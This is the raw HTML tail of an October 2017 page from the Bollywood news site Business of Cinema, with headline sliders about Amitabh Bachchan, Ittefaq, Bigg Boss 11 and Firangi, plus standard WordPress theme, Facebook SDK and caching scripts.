class="entry-title td-module-title"><a href="https://businessofcinema.com/bollywood_news/heres-amitabh-bachchan-opted-salman-khan-starrer-race-3/414097" rel="bookmark" title="Here’s Why Amitabh Bachchan Opted Out Of Salman Khan Starrer Race 3!">Here’s Why Amitabh Bachchan Opted Out Of Salman Khan Starrer Race 3!</a></h3><div class="td-module-meta-info"><span class="td-post-author-name"><a href="https://businessofcinema.com/author/businessofcinema-news-network">BusinessofCinema News Network</a> <span>-</span> </span><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-10-12T17:09:50+00:00" >2017/10/12</time></span><div class="td-post-comments"><i class="td-icon-comments"></i><a href="https://businessofcinema.com/bollywood_news/heres-amitabh-bachchan-opted-salman-khan-starrer-race-3/414097#respond">0</a></div></div></div></div><div id="td_uid_10_59df5653ebfa3_item_1" class = "td_module_slide td-animation-stack td-image-gradient"><div class="td-module-thumb"><a href="https://businessofcinema.com/bollywood_news/juno-chopra-celebrates-wrap-upcoming-film-ittefaq/414089" rel="bookmark" title="Juno Chopra Celebrates The Wrap Of His Upcoming Film Ittefaq"><img width="324" height="400" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/ittefaq-324x400.jpg" alt="ittefaq" title="Juno Chopra Celebrates The Wrap Of His Upcoming Film Ittefaq"/></a></div><div class="td-slide-meta"><span class="slide-meta-cat"><a href="https://businessofcinema.com/category/bollywood_news">BOLLYWOOD</a></span><h3 class="entry-title td-module-title"><a href="https://businessofcinema.com/bollywood_news/juno-chopra-celebrates-wrap-upcoming-film-ittefaq/414089" rel="bookmark" title="Juno Chopra Celebrates The Wrap Of His Upcoming Film Ittefaq">Juno Chopra Celebrates The Wrap Of His Upcoming Film Ittefaq</a></h3><div class="td-module-meta-info"><span class="td-post-author-name"><a href="https://businessofcinema.com/author/businessofcinema-news-network">BusinessofCinema News Network</a> <span>-</span> </span><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-10-12T17:03:45+00:00" >2017/10/12</time></span><div class="td-post-comments"><i class="td-icon-comments"></i><a href="https://businessofcinema.com/bollywood_news/juno-chopra-celebrates-wrap-upcoming-film-ittefaq/414089#respond">0</a></div></div></div></div><div id="td_uid_10_59df5653ebfa3_item_2" class = "td_module_slide td-animation-stack td-image-gradient"><div class="td-module-thumb"><a href="https://businessofcinema.com/bollywood_news/see-photos-amitabh-bachchan-celebrating-75th-birthday/414092" rel="bookmark" title="See Photos: This Is How Amitabh Bachchan Is Celebrating His 75th Birthday!"><img width="324" height="400" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/amitabh-bachchan--324x400.jpg" alt="amitabh bachchan" title="See Photos: This Is How Amitabh Bachchan Is Celebrating His 75th Birthday!"/></a></div><div class="td-slide-meta"><span class="slide-meta-cat"><a href="https://businessofcinema.com/category/bollywood_news">BOLLYWOOD</a></span><h3 class="entry-title td-module-title"><a href="https://businessofcinema.com/bollywood_news/see-photos-amitabh-bachchan-celebrating-75th-birthday/414092" rel="bookmark" title="See Photos: This Is How Amitabh Bachchan Is Celebrating His 75th Birthday!">See Photos: This Is How Amitabh Bachchan Is Celebrating His 75th Birthday!</a></h3><div class="td-module-meta-info"><span class="td-post-author-name"><a href="https://businessofcinema.com/author/businessofcinema-news-network">BusinessofCinema News Network</a> <span>-</span> </span><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-10-12T16:54:20+00:00" >2017/10/12</time></span><div class="td-post-comments"><i class="td-icon-comments"></i><a href="https://businessofcinema.com/bollywood_news/see-photos-amitabh-bachchan-celebrating-75th-birthday/414092#respond">0</a></div></div></div></div><div id="td_uid_10_59df5653ebfa3_item_3" class = "td_module_slide td-animation-stack td-image-gradient"><div class="td-module-thumb"><a href="https://businessofcinema.com/tele/salman-khan-bigg-boss-11/exclusive-bigg-boss-11-vikas-gupta-shilpa-shindes-fight-take-major-twist-house/414082" rel="bookmark" title="Exclusive Bigg Boss 11: Vikas Gupta And Shilpa Shinde&#8217;s Fight To Take Major Twist In The House!"><img width="324" height="400" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/Bigg-boss--324x400.jpg" alt="bigg boss 11 vikas gupta shilpa shinde" title="Exclusive Bigg Boss 11: Vikas Gupta And Shilpa Shinde&#8217;s Fight To Take Major Twist In The House!"/></a></div><div class="td-slide-meta"><span class="slide-meta-cat"><a href="https://businessofcinema.com/category/tele/salman-khan-bigg-boss-11">salman khan bigg boss 11</a></span><h3 class="entry-title td-module-title"><a href="https://businessofcinema.com/tele/salman-khan-bigg-boss-11/exclusive-bigg-boss-11-vikas-gupta-shilpa-shindes-fight-take-major-twist-house/414082" rel="bookmark" title="Exclusive Bigg Boss 11: Vikas Gupta And Shilpa Shinde&#8217;s Fight To Take Major Twist In The House!">Exclusive Bigg Boss 11: Vikas Gupta And Shilpa Shinde&#8217;s Fight To Take Major Twist In The House!</a></h3><div class="td-module-meta-info"><span class="td-post-author-name"><a href="https://businessofcinema.com/author/businessofcinema-news-network">BusinessofCinema News Network</a> <span>-</span> </span><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-10-12T16:17:41+00:00" >2017/10/12</time></span><div class="td-post-comments"><i class="td-icon-comments"></i><a href="https://businessofcinema.com/tele/salman-khan-bigg-boss-11/exclusive-bigg-boss-11-vikas-gupta-shilpa-shindes-fight-take-major-twist-house/414082#respond">0</a></div></div></div></div><div id="td_uid_10_59df5653ebfa3_item_4" class = "td_module_slide td-animation-stack td-image-gradient"><div class="td-module-thumb"><a href="https://businessofcinema.com/bollywood_news/watch-kapil-sharma-kicks-off-firangi-style-firangis-first-motion-poster/414079" rel="bookmark" title="Watch: Kapil Sharma Kicks Off A Firangi In Style In Firangi’s First Motion Poster"><img width="324" height="400" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/10/kapil-sharma-firangi-324x400.jpg" alt="Kapil Sharma Firangi" title="Watch: Kapil Sharma Kicks Off A Firangi In Style In Firangi’s First Motion Poster"/></a></div><div class="td-slide-meta"><span class="slide-meta-cat"><a href="https://businessofcinema.com/category/bollywood_news">BOLLYWOOD</a></span><h3 class="entry-title td-module-title"><a href="https://businessofcinema.com/bollywood_news/watch-kapil-sharma-kicks-off-firangi-style-firangis-first-motion-poster/414079" rel="bookmark" title="Watch: Kapil Sharma Kicks Off A Firangi In Style In Firangi’s First Motion Poster">Watch: Kapil Sharma Kicks Off A Firangi In Style In Firangi’s First Motion Poster</a></h3><div class="td-module-meta-info"><span class="td-post-author-name"><a href="https://businessofcinema.com/author/businessofcinema-news-network">BusinessofCinema News Network</a> <span>-</span> </span><span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-10-12T16:00:29+00:00" >2017/10/12</time></span><div class="td-post-comments"><i class="td-icon-comments"></i><a href="https://businessofcinema.com/bollywood_news/watch-kapil-sharma-kicks-off-firangi-style-firangis-first-motion-poster/414079#respond">0</a></div></div></div></div></div><i class = "td-icon-left prevButton"></i><i class = "td-icon-right nextButton"></i></div></div></div> <!-- ./block1 -->                            </div>
                        </div>
                            </div> <!-- /.td-pb-row -->
    </div> <!-- /.td-container -->
</div> <!-- /.td-main-content-wrap -->


<!-- Instagram -->



<!-- Footer -->


<!-- Sub Footer -->
    <div class="td-sub-footer-container td-container-wrap ">
        <div class="td-container">
            <div class="td-pb-row">
                <div class="td-pb-span td-sub-footer-menu">
                        <div class="menu-footer-container"><ul id="menu-footer" class="td-subfooter-menu"><li id="menu-item-42655" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-first td-menu-item td-normal-menu menu-item-42655"><a href="https://businessofcinema.com/about">ABOUT</a></li>
<li id="menu-item-42657" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-42657"><a href="https://businessofcinema.com/contact-us">CONTACT US</a></li>
<li id="menu-item-42658" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-42658"><a href="https://businessofcinema.com/legal">LEGAL</a></li>
<li id="menu-item-42660" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-42660"><a href="https://businessofcinema.com/work-with-boc">WORK WITH BOC</a></li>
<li id="menu-item-42659" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-42659"><a href="https://businessofcinema.com/syndication">SYNDICATION</a></li>
<li id="menu-item-42656" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-42656"><a href="https://businessofcinema.com/advertise-with-boc">ADVERTISE WITH BOC</a></li>
<li id="menu-item-170166" class="menu-item menu-item-type-post_type menu-item-object-page td-menu-item td-normal-menu menu-item-170166"><a href="https://businessofcinema.com/privacy-policy">Privacy Policy</a></li>
</ul></div>                </div>

                <div class="td-pb-span td-sub-footer-copy">
                    Copyright Businessofcinema Inc.                </div>
            </div>
        </div>
    </div>
</div><!--close td-outer-wrap-->

                <div class="td-more-articles-box">
                    <i class="td-icon-close td-close-more-articles-box"></i>
                    <span class="td-more-articles-box-title">MORE STORIES</span>
                    <div class="td-content-more-articles-box">

                    
        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://businessofcinema.com/bollywood_news/shah-rukh-khan-speaks-failures-life-like-never/385945" rel="bookmark" title="Shah Rukh Khan Speaks About His Failures In Life Like Never Before!"><img width="100" height="65" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/01/Shahrukh-Khan-pic.jpg" srcset="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/01/Shahrukh-Khan-pic.jpg 620w, https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2017/01/Shahrukh-Khan-pic-300x194.jpg 300w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Shah Rukh Khan Speaks About His Failures In Life Like Never Before!"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://businessofcinema.com/bollywood_news/shah-rukh-khan-speaks-failures-life-like-never/385945" rel="bookmark" title="Shah Rukh Khan Speaks About His Failures In Life Like Never Before!">Shah Rukh Khan Speaks About His Failures In Life Like Never...</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2017-02-22T16:22:18+00:00" >2017/02/22</time></span>                            </div>
        </div>

        </div>

        
        <div class="td_module_6 td_module_wrap td-animation-stack">

        <div class="td-module-thumb"><a href="https://businessofcinema.com/bollywood_news/guess-will-play-sanjay-dutts-daughter-bhoomi/366394" rel="bookmark" title="Guess Who Will Play Sanjay Dutt&#8217;s Daughter In Bhoomi?"><img width="100" height="65" class="entry-thumb" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2016/11/Sanjay-Dutt-Blur.jpg" srcset="https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2016/11/Sanjay-Dutt-Blur.jpg 620w, https://d23ipcd5miwp4q.cloudfront.net/wp-content/uploads/2016/11/Sanjay-Dutt-Blur-300x194.jpg 300w" sizes="(max-width: 100px) 100vw, 100px" alt="" title="Guess Who Will Play Sanjay Dutt&#8217;s Daughter In Bhoomi?"/></a></div>
        <div class="item-details">
            <h3 class="entry-title td-module-title"><a href="https://businessofcinema.com/bollywood_news/guess-will-play-sanjay-dutts-daughter-bhoomi/366394" rel="bookmark" title="Guess Who Will Play Sanjay Dutt&#8217;s Daughter In Bhoomi?">Guess Who Will Play Sanjay Dutt&#8217;s Daughter In Bhoomi?</a></h3>            <div class="td-module-meta-info">
                                                <span class="td-post-date"><time class="entry-date updated td-module-date" datetime="2016-11-22T18:53:41+00:00" >2016/11/22</time></span>                            </div>
        </div>

        </div>

                            </div>
                </div>

    <!--

        Theme: Newspaper by tagDiv.com 2017
        Version: 8.1 (rara)
        Deploy mode: deploy
        Speed booster: v4.9

        uid: 59df56547cdb0
    -->

    
<!-- Custom css form theme panel -->
<style type="text/css" media="screen">
/* custom css theme panel */
.td-related-title > .td-related-right {
display: none;
}
</style>



<script type='text/javascript'>
/* <![CDATA[ */
var wpcf7 = {"apiSettings":{"root":"https:\/\/businessofcinema.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"},"recaptcha":{"messages":{"empty":"Please verify that you are not a robot."}},"cached":"1"};
/* ]]> */
</script>



<script type="text/javascript" src="https://d23ipcd5miwp4q.cloudfront.net/wp-content/cache/minify/2a9ba.js"></script>

<!-- Facebook Comments Plugin for WordPress: http://peadig.com/wordpress-plugins/facebook-comments/ -->
<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/en_US/sdk.js#xfbml=1&appId=510095189187222&version=v2.3";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>

<!-- JS generated by theme -->

<script>
    

jQuery(document).ready(function() {
    jQuery("#td_uid_10_59df5653ebfa3").iosSlider({
        snapToChildren: true,
        desktopClickDrag: true,
        keyboardControls: false,
        responsiveSlideContainer: true,
        responsiveSlides: true,
        
            autoSlide: true,
            autoSlideTimer: 10000,
            

        infiniteSlider: true,
        navPrevSelector: jQuery("#td_uid_10_59df5653ebfa3 .prevButton"),
        navNextSelector: jQuery("#td_uid_10_59df5653ebfa3 .nextButton")
        ,
                //onSliderLoaded : td_resize_normal_slide,
                //onSliderResize : td_resize_normal_slide_and_update
    });
});
    

	

		(function(){
			var html_jquery_obj = jQuery('html');

			if (html_jquery_obj.length && (html_jquery_obj.is('.ie8') || html_jquery_obj.is('.ie9'))) {

				var path = 'https://d23ipcd5miwp4q.cloudfront.net/wp-content/themes/Newspaper-child/style.css';

				jQuery.get(path, function(data) {

					var str_split_separator = '#td_css_split_separator';
					var arr_splits = data.split(str_split_separator);
					var arr_length = arr_splits.length;

					if (arr_length > 1) {

						var dir_path = 'https://businessofcinema.com/wp-content/themes/Newspaper';
						var splited_css = '';

						for (var i = 0; i < arr_length; i++) {
							if (i > 0) {
								arr_splits[i] = str_split_separator + ' ' + arr_splits[i];
							}
							//jQuery('head').append('<style>' + arr_splits[i] + '</style>');

							var formated_str = arr_splits[i].replace(/\surl\(\'(?!data\:)/gi, function regex_function(str) {
								return ' url(\'' + dir_path + '/' + str.replace(/url\(\'/gi, '').replace(/^\s+|\s+$/gm,'');
							});

							splited_css += "<style>" + formated_str + "</style>";
						}

						var td_theme_css = jQuery('link#td-theme-css');

						if (td_theme_css.length) {
							td_theme_css.after(splited_css);
						}
					}
				});
			}
		})();

	
	
</script>


<!-- Header style compiled by theme -->

<style>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</style>



			<div id="tdw-css-writer" style="display: none" class="tdw-drag-dialog tdc-window-sidebar">
				<header>

				
					<a title="Editor" class="tdw-tab tdc-tab-active" href="#" data-tab-content="tdw-tab-editor">Edit with Live CSS</a>
					<div class="tdw-less-info" title="This will be red when errors are detected in your CSS and LESS"></div>
				
				</header>
				<div class="tdw-content">

					
					<div class="tdw-tabs-content tdw-tab-editor tdc-tab-content-active">


						<script>

							(function(jQuery, undefined) {

								jQuery(window).ready(function() {

									if ( 'undefined' !== typeof tdcAdminIFrameUI ) {
										var $liveIframe  = tdcAdminIFrameUI.getLiveIframe();

										if ( $liveIframe.length ) {
											$liveIframe.load(function() {
												$liveIframe.contents().find( 'body').append( '<textarea class="tdw-css-writer-editor" style="display: none"></textarea>' );
											});
										}
									}

								});

							})(jQuery);

						</script>


						<textarea class="tdw-css-writer-editor td_live_css_uid_1_59df56547d501"></textarea>
						<div id="td_live_css_uid_1_59df56547d501" class="td-code-editor"></div>


						<script>
							jQuery(window).load(function (){

								if ( 'undefined' !== typeof tdLiveCssInject ) {

									tdLiveCssInject.init();


									var editor_textarea = jQuery('.td_live_css_uid_1_59df56547d501');
									var languageTools = ace.require("ace/ext/language_tools");
									var tdcCompleter = {
										getCompletions: function (editor, session, pos, prefix, callback) {
											if (prefix.length === 0) {
												callback(null, []);
												return
											}

											if ('undefined' !== typeof tdcAdminIFrameUI) {

												var data = {
													error: undefined,
													getShortcode: ''
												};

												tdcIFrameData.getShortcodeFromData(data);

												if (!_.isUndefined(data.error)) {
													tdcDebug.log(data.error);
												}

												if (!_.isUndefined(data.getShortcode)) {

													var regex = /el_class=\"([A-Za-z0-9_-]*\s*)+\"/g,
														results = data.getShortcode.match(regex);

													var elClasses = {};

													for (var i = 0; i < results.length; i++) {
														var currentClasses = results[i]
															.replace('el_class="', '')
															.replace('"', '')
															.split(' ');

														for (var j = 0; j < currentClasses.length; j++) {
															if (_.isUndefined(elClasses[currentClasses[j]])) {
																elClasses[currentClasses[j]] = '';
															}
														}
													}

													var arrElClasses = [];

													for (var prop in elClasses) {
														arrElClasses.push(prop);
													}

													callback(null, arrElClasses.map(function (item) {
														return {
															name: item,
															value: item,
															meta: 'in_page'
														}
													}));
												}
											}
										}
									};
									languageTools.addCompleter(tdcCompleter);

									window.editor = ace.edit("td_live_css_uid_1_59df56547d501");

									// 'change' handler is written as function because it's called by tdc_on_add_css_live_components (of wp_footer hook)
									// We did it to reattach the existing compiled css to the new content received from server.
									window.editorChangeHandler = function () {
										//tdwState.lessWasEdited = true;

										window.onbeforeunload = function () {
											if (tdwState.lessWasEdited) {
												return "You have attempted to leave this page. Are you sure?";
											}
											return false;
										};

										var editorValue = editor.getSession().getValue();

										editor_textarea.val(editorValue);

										if ('undefined' !== typeof tdcAdminIFrameUI) {
											tdcAdminIFrameUI.getLiveIframe().contents().find('.tdw-css-writer-editor:first').val(editorValue);

											// Mark the content as modified
											// This is important for showing info when composer closes
                                            tdcMain.setContentModified();
										}

										tdLiveCssInject.less();
									};

									editor.getSession().setValue(editor_textarea.val());
									editor.getSession().on('change', editorChangeHandler);

									editor.setTheme("ace/theme/textmate");
									editor.setShowPrintMargin(false);
									editor.getSession().setMode("ace/mode/less");
									editor.setOptions({
										enableBasicAutocompletion: true,
										enableSnippets: true,
										enableLiveAutocompletion: false
									});

								}

							});
						</script>

					</div>
				</div>

				<footer>

					
						<a href="#" class="tdw-save-css">Save</a>
						<div class="tdw-more-info-text">Write CSS OR LESS and hit save. CTRL + SPACE for auto-complete.</div>

					
					<div class="tdw-resize"></div>
				</footer>
			</div>
			
</body>
</html>
<!-- Performance optimized by W3 Total Cache. Learn more: https://www.w3-edge.com/products/

Object Caching 3852/3929 objects using disk
Page Caching using disk: enhanced (SSL caching disabled)
Content Delivery Network via Amazon Web Services: CloudFront: d23ipcd5miwp4q.cloudfront.net
Minified using disk
Database Caching 20/42 queries in 1.400 seconds using disk

 Served from: businessofcinema.com @ 2017-10-12 17:17:32 by W3 Total Cache -->